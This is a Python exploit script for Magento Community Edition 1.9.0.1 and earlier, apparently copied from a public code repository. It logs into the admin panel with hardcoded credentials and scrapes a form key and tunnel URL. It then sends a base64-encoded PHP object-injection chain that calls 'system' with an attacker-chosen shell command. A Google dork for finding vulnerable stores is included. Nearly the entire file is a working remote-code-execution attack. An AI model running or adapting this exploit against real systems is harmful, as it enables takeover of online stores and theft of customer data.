main
Raw Download raw file 
 1#!/usr/bin/python
 2# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE 
 3# Google Dork: "Powered by Magento"
 4# Date: 08/18/2015
 5# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
 6# Vendor Homepage: http://magento.com/
 7# Software Link: https://www.magentocommerce.com/download
 8# Version: 1.9.0.1 and below
 9# Tested on: Ubuntu 15
10# CVE : none
11
12from hashlib import md5
13import sys
14import re
15import base64
16import mechanize
17
18
19def usage():
20    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
21    sys.exit()
22
23
24if len(sys.argv) != 3:
25    usage()
26
27# Command-line args
28target = sys.argv[1]
29arg = sys.argv[2]
30
31# Config.
32username = 'ypwq'
33password = '123'
34php_function = 'system'  # Note: we can only pass 1 argument to the function
35install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml
36
37# POP chain to pivot into call_user_exec
38payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
39          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
40          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
41          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
42          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
43          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
44                                                                                     len(arg), arg)
45# Setup the mechanize browser and options
46br = mechanize.Browser()
47#br.set_proxies({"http": "localhost:8080"})
48br.set_handle_robots(False)
49
50request = br.open(target)
51
52br.select_form(nr=0)
53#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
54br.form.fixup()
55br['login[username]'] = username
56br['login[password]'] = password
57
58br.method = "POST"
59request = br.submit()
60content = request.read()
61
62url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
63url = url.group(1)
64key = re.search("var FORM_KEY = '(.*)'", content.decode())
65key = key.group(1)
66
67request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
68tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
69tunnel = tunnel.group(1)
70
71payload = base64.b64encode(payload.encode())
72gh = md5(payload + install_date).hexdigest()
73
74#print("T",tunnel)
75#print("P",payload)
76#print("GH", gh)
77exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
78
79try:
80    request = br.open(exploit)
81except (mechanize.HTTPError, mechanize.URLError) as e:
82    print(e.read().decode())
83